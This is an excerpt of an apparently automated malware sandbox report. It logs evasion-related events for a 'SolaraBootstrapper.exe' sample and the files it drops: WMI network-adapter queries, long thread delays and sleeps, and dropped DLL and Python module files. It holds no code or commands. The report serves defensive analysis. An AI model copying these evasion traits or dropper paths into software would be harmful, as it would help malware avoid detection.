    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 17B0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 31B0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 51B0000 memory reserve | memory write watch
    Source: C:\agentInto\fontsessionruntime.exeMemory allocated: 16B0000 memory reserve | memory write watch
    Source: C:\agentInto\fontsessionruntime.exeMemory allocated: 1B420000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599875
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599735
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599607
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599435
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599299
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599130
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599000
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598889
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598767
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598641
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598507
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598297
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598125
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597922
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597672
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597507
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597339
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597157
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596657
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596485
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596302
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596157
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596000
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595868
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595749
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595579
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595450
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595265
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595110
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594962
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594825
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594592
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594461
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594324
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594195
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594072
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593891
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593742
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593563
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593368
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593211
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593075
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592963
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592843
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592730
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592485
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592219
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592094
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591975
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591853
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591708
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591579
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591454
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591311
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591172
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590994
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590871
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590748
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590636
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590485
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590360
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590234
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589922
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589791
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589641
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589509
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589384
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589262
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589094
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588964
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588852
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588729
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588617
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588505
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588386
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588268
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588150
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588021
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587880
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587753
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587630
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587509
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587393
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587275
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587168
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587040
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586918
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586798
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586682
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586568
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586443
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586323
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586205
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586088
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585963
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585845
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585730
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585616
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585492
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585374
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585254
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585133
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\agentInto\fontsessionruntime.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 7043
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 2250
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2297
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3287
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2004
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 399
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 789
    Source: C:\agentInto\fontsessionruntime.exeWindow / User API: threadDelayed 884
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\libcurl.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\msvcp140.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\cpr.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_ssl.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_sqlite3.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\select.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\rar.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\zlib1.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\WebView2Loader.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_queue.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exeJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_ctypes.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\python312.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -25825441703193356s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -600000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -599875s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -599735s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -599607s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -599435s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -599299s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -599130s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -599000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -598889s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -598767s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -598641s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -598507s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -598297s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -598125s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -597922s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -597672s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -597507s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -597339s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -597157s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -596657s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -596485s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -596302s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -596157s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -596000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -595868s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -595749s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -595579s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -595450s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -595265s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -595110s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -594962s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -594825s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -594592s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -594461s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -594324s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -594195s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -594072s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -593891s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -593742s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -593563s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -593368s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -593211s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -593075s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -592963s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -592843s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -592730s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -592485s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -592219s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -592094s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -591975s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -591853s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -591708s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -591579s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -591454s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -591311s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -591172s >= -30000s
